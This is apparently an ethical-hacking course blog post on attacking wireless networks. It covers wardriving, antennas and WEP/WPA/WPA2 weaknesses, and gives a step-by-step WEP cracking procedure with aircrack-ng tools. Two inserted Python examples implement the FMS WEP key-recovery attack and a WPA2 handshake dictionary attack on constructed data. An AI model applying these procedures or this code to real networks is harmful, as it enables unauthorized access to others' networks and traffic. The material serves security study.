Certified Ethical Hacker - Part 14-1 - Hacking Wireless Networks

by Riazul H. Rozen
March 9, 2018

Wireless Area Network and the security hazards surrounding it

Wireless area networks are used worldwide by individuals and corporations alike. The wireless communication module is broadcast over radio and is fitted in computers, smartphones, game consoles and so on, for the sole purpose of connecting to a network resource or to the internet. There are varying types of wireless network connection, each designed to make communication between end users and network resources easy.


Some of these connections are -

  • LAN-to-LAN wireless network
  • 3G/4G Hotspot
  • Multiple Access Points
  • Extension of a wired network

The wireless area network is simple and very beneficial, as there is no need for cabling. The wireless module is also advantageous for remote areas, and it makes internet access easy in public places like airports, schools or restaurants. This freedom is not without its own challenges: bandwidth drops as the number of computers connected to the wireless network grows, and wireless networks are very prone to security attacks, some of which are highlighted in this article.

There are different means of detecting open wireless networks for exploitation; they are -

  • Warflying: attackers use drones or light aircraft to detect open wireless networks from the air.
  • WarChalking: symbols are drawn in public places so that others know there are open wireless networks in those areas.
  • WarWalking: attackers walk around with wireless-enabled devices to detect open wireless networks.
  • WarDriving: attackers drive around in vehicles to determine which wireless networks are open.

Wireless networks are broadcast through antennas, which also extend their range. Attackers can use antennas of their own to gather information and carry out malicious activity from a distance. There are different types of antenna -

  • Omnidirectional Antenna: used in wireless base stations; it broadcasts and receives radio waves through a full 360 degrees.
  • Directional Antenna: broadcasts and receives radio waves in only one direction, so its gain is concentrated along that line.
  • Yagi Antenna: a unidirectional antenna used for frequency bands from 10 MHz up to VHF and UHF.
  • Dipole Antenna: radiates in two directions (bidirectional) and is used to support client connections.
  • Parabolic Grid Antenna: can pick up Wi-Fi signals from about ten miles away. Attackers use a parabolic grid antenna to get a good signal from far outside the building, which means more traffic to capture, enough output power for man-in-the-middle attacks, and a usable link over which to tamper with traffic.

A wireless network is usually protected with encryption, to protect the information carried and the privacy of the users during wireless transmission.

There are various types of wireless encryption, such as WEP, WPA and WPA2.

WEP (Wired Equivalent Privacy)

WEP provides privacy for data in transit between two points on the wireless network. While WEP is known for being the oldest and original wireless encryption scheme, it is riddled with flaws and vulnerabilities.

WEP is weak for several reasons, among them -

  • There is no defined mechanism for distributing the encryption keys; the same static key is configured by hand on every device.
  • Association and disassociation messages are not authenticated, so there is no way to validate them and they can be forged.
  • The IV is only 24 bits long. On a busy network the IV space is exhausted and IVs are reused within hours, and a repeated IV is expected after only a few thousand frames.
  • Because the IV is so short, the same RC4 keystream is reused after short periods, which makes WEP susceptible to attacks based on key and keystream reuse.
  • Many wireless adapters generate their IV sequence the same way (for example counting up from zero), especially when they come from the same vendor, so the same IVs are highly likely to be produced more than once.

How to determine weak Initialization Vectors (IVs)

Weak IVs are detrimental to the encryption, as they create an easy route of attack. A weak IV leaks information about the position of the key byte it is combined with in the RC4 key schedule, and it gives the attacker a way to recover the bytes of the base (secret) key one at a time. The properties that make WEP's IVs weak are -

  • The IV is simply prepended to the base key to form the RC4 key (IV || base key), so the first steps of the RC4 key schedule depend on values the attacker can read off the frame; IVs of the form (A+3, 255, X) expose base key byte A (the FMS attack).
  • The IV is short (24 bits), so it is vulnerable to key reuse and message replay.
  • Integrity is only a CRC-32 checksum, so tampering with messages cannot be reliably detected.

How To Crack a WEP system

  • Put the wireless adapter into monitor mode (for example with airmon-ng) and determine whether it can inject frames towards the target access point (aireplay-ng has an injection test, -9, for this).
  • Sniff the target's traffic with a tool such as airodump-ng or Cain & Abel to collect as many frames with distinct IVs as possible.
  • Fake an authentication to the access point with aireplay-ng (fake-authentication attack, -1), so that the access point accepts frames injected from the attacker's MAC address.
  • Inject packets with aireplay-ng in ARP request replay mode (-3), which makes the access point generate new IVs quickly.
  • Extract the encryption key from the collected IVs with aircrack-ng or Cain & Abel.
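The attack that the weak-IV section and the last step of the procedure above describe, implemented as an added example (not code from the original article, nor from aircrack-ng or Cain & Abel): RC4 keyed with IV || secret key, a constructed capture of WEP frames that use the weak IVs (A+3, 255, X), and the FMS vote that recovers the secret key one byte at a time from nothing more than each frame's IV and first ciphertext byte. Only the key-extraction step is simulated; monitor mode, fake authentication and ARP replay need a real adapter. The 40-bit key 0badc0ffee, the reduced frame (IV plus first ciphertext byte) and the one-frame-per-weak-IV capture are assumptions made for the example.

```python
"""FMS weak-IV attack on WEP (RC4 keyed with IV || secret key), simulated offline.

Constructed example: the 'access point' encrypts data frames whose first
plaintext byte is the LLC/SNAP DSAP value 0xAA (true of every WEP data frame)
and happens to use the weak IV family (A+3, 255, X). The 'attacker' sees only
each frame's IV and first ciphertext byte.
"""
from collections import Counter

SNAP_FIRST_BYTE = 0xAA   # known first plaintext byte of every WEP data frame
KEY_LEN = 5              # 40-bit WEP key; a 104-bit key has 13 bytes


def rc4_ksa(key):
    """RC4 key-scheduling algorithm: returns the 256-byte permutation S."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_byte(key):
    """First keystream byte from RC4's PRGA for this key (all that FMS needs)."""
    S = rc4_ksa(key)
    j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def wep_frame(iv, secret):
    """AP side: (iv, first ciphertext byte) of a data frame sent under this IV."""
    return iv, rc4_first_byte(iv + secret) ^ SNAP_FIRST_BYTE


def weak_iv_capture(secret):
    """Constructed capture: one frame per weak IV (A+3, 255, X) for each key byte A."""
    return [wep_frame(bytes([A + 3, 255, X]), secret)
            for A in range(len(secret)) for X in range(256)]


def fms_candidate(iv, z0, known):
    """One FMS vote for secret byte number len(known), or None if the IV is not weak.

    Run the KSA for its first A+3 steps only (the IV plus the A secret bytes
    already recovered). If the 'resolved condition' holds, the first keystream
    byte z0 depends only on that state and on the next key byte, which we solve
    for. A resolved IV votes for the true byte with probability about 5 % (e^-3)
    and for any other value with probability 1/256, so votes pile up on the truth.
    """
    A = len(known)
    K = iv + known                       # the first A+3 bytes of the RC4 key
    S = list(range(256))
    j = 0
    for i in range(A + 3):
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] < A + 3 and (S[1] + S[S[1]]) & 0xFF == A + 3:
        return (S.index(z0) - j - S[A + 3]) & 0xFF
    return None


def fms_votes(frames, known):
    """Attacker side: tally candidate values for the next secret key byte."""
    votes = Counter()
    for iv, c0 in frames:
        cand = fms_candidate(iv, c0 ^ SNAP_FIRST_BYTE, known)
        if cand is not None:
            votes[cand] += 1
    return votes


def recover_key(frames, key_len=KEY_LEN):
    """Recover the secret key byte by byte; each byte depends on the ones before it."""
    known = b""
    for _ in range(key_len):
        known += bytes([fms_votes(frames, known).most_common(1)[0][0]])
    return known


if __name__ == "__main__":
    secret = bytes.fromhex("0badc0ffee")      # constructed 40-bit WEP key
    capture = weak_iv_capture(secret)
    print("frames captured:", len(capture))
    print("real key:      ", secret.hex())
    print("recovered key: ", recover_key(capture, len(secret)).hex())
```

Run it and it prints the recovered key next to the real one. With roughly 250 weak IVs per key byte the right value typically collects 10 to 15 votes against a handful at most for any wrong one; on a live network the attacker has to wait for the access point to emit those IVs, which is exactly why the ARP replay step exists.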

WPA (Wi-Fi Protected Access)

WPA is another encryption scheme designed for wireless local area networks, based on the IEEE 802.11i standard. It is stronger than its WEP predecessor, and it provides data security by requiring either PSK or EAP authentication.

WPA works with TKIP (Temporal Key Integrity Protocol), which keeps the RC4 stream cipher but uses 128-bit keys and a 64-bit MIC (Michael) for integrity. It is a step ahead of WEP because it addresses WEP's flaws by extending the IV to 48 bits and using a per-packet key mixing function.

TKIP uses temporal keys that are changed after every 10,000 packets, and since every packet is encrypted under a mixed key of its own, the cryptanalytic attacks that rely on key reuse in WEP do not apply.

It is important to note that these temporal keys are derived from the PMK (Pairwise Master Key), which comes from EAP authentication in enterprise mode or from the pre-shared key in personal mode. The exchange in which client and access point derive and confirm the temporal keys is known as the four-way handshake.

WPA2 (Wi-Fi Protected Access 2)

WPA2 is designed for corporate bodies and home users alike, and comes with stronger security measures for data protection and access control; it replaces TKIP and RC4 with AES-CCMP. There are two modes of WPA2:

For personal use (WPA2-Personal): a pre-shared key (PSK) protects against illegitimate access. The passphrase of 8-63 ASCII characters is combined with the network's SSID to derive a 256-bit PMK that every wireless device must know; from it each device derives its own session keys, including the 128-bit key that encrypts its network traffic.

For enterprise (WPA2-Enterprise): 802.1X with EAP and a RADIUS server provides central authentication through a range of methods, from token cards to certificates. Users authenticate with credentials that the central server validates, and the server then supplies the key material from which the session keys are derived.
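The key derivation that the WPA four-way handshake passage and the WPA2-Personal passage describe, as an added example (not code from the original article, nor from aircrack-ng, hashcat or wpa_supplicant): the passphrase and SSID are turned into the 256-bit PMK with PBKDF2-HMAC-SHA1, the PMK into the PTK with the 802.11i PRF over both MAC addresses and both nonces, and the KCK slice of the PTK into the MIC of handshake message 2. Because everything but the passphrase is visible in a captured handshake, the same functions give the offline dictionary attack at the end. The SSID CorpWifi, the MAC addresses, the nonces, the simplified EAPOL-Key frame and the wordlist are constructed for the example.

```python
"""WPA/WPA2-Personal key derivation, the 4-way handshake's PTK, and a dictionary
attack on the handshake MIC, as an offline, constructed example.

No network is involved: the AP/client MAC addresses, nonces, the EAPOL-Key
message and the passphrase below are made up so that the MIC a real client
would send in message 2 of the handshake can be reproduced and then attacked,
the way aircrack-ng or hashcat attack a captured handshake.
"""
import hashlib
import hmac

# Constructed handshake parameters (assumptions made for this example).
SSID = "CorpWifi"
AA = bytes.fromhex("00112233aabb")      # authenticator (AP) MAC address
SPA = bytes.fromhex("66778899ccdd")     # supplicant (client) MAC address
ANONCE = bytes(range(32))               # AP nonce from message 1
SNONCE = bytes(range(32, 64))           # client nonce from message 2
# Simplified EAPOL-Key message 2 (key descriptor version 2, i.e. WPA2/AES):
# EAPOL header, descriptor type, key info 0x010a, key length, replay counter,
# SNonce, key IV, RSC, key ID, the 16-byte Key MIC field zeroed (the MIC is
# always computed over the frame with that field zeroed), key data length and
# an RSN information element (CCMP group and pairwise cipher, PSK AKM).
EAPOL_MSG2_ZERO_MIC = (
    bytes.fromhex("0103007502010a0000" + "00" * 7 + "01")
    + SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes.fromhex("0016")
    + bytes.fromhex("30140100000fac040100000fac040100000fac020000")
)


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    for counter in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce, nbytes=48):
    """4-way handshake: PTK = PRF(PMK, "Pairwise key expansion", ordered MACs and nonces).

    48 bytes for WPA2-CCMP (KCK | KEK | TK, 16 bytes each); WPA-TKIP asks for 64
    so that the two 8-byte Michael MIC keys follow the TK.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck, eapol_frame_zero_mic):
    """Key MIC for descriptor version 2: HMAC-SHA1 under the KCK, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_zero_mic, hashlib.sha1).digest()[:16]


def client_message2_mic(passphrase):
    """Supplicant side: the MIC a client that knows this passphrase puts in message 2."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_MSG2_ZERO_MIC)


def crack_psk(mic, wordlist):
    """Attacker side: everything but the passphrase is in the capture, so try candidates."""
    for candidate in wordlist:
        if hmac.compare_digest(client_message2_mic(candidate), mic):
            return candidate
    return None


if __name__ == "__main__":
    captured_mic = client_message2_mic("correct horse battery")   # what the sniffer saw
    wordlist = ["password", "letmein", "correct horse battery", "hunter22"]
    print("PMK for ('password', 'IEEE'):", pmk_from_passphrase("password", "IEEE").hex())
    print("passphrase found:", crack_psk(captured_mic, wordlist))
```

The 4096 PBKDF2 iterations are the only thing slowing the attacker down, which is why the strength of WPA2-Personal is the strength of the passphrase, and why WPA2-Enterprise, where the PMK comes from the EAP exchange instead of a shared passphrase, is not exposed to this attack.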

Published with the express permission of the author.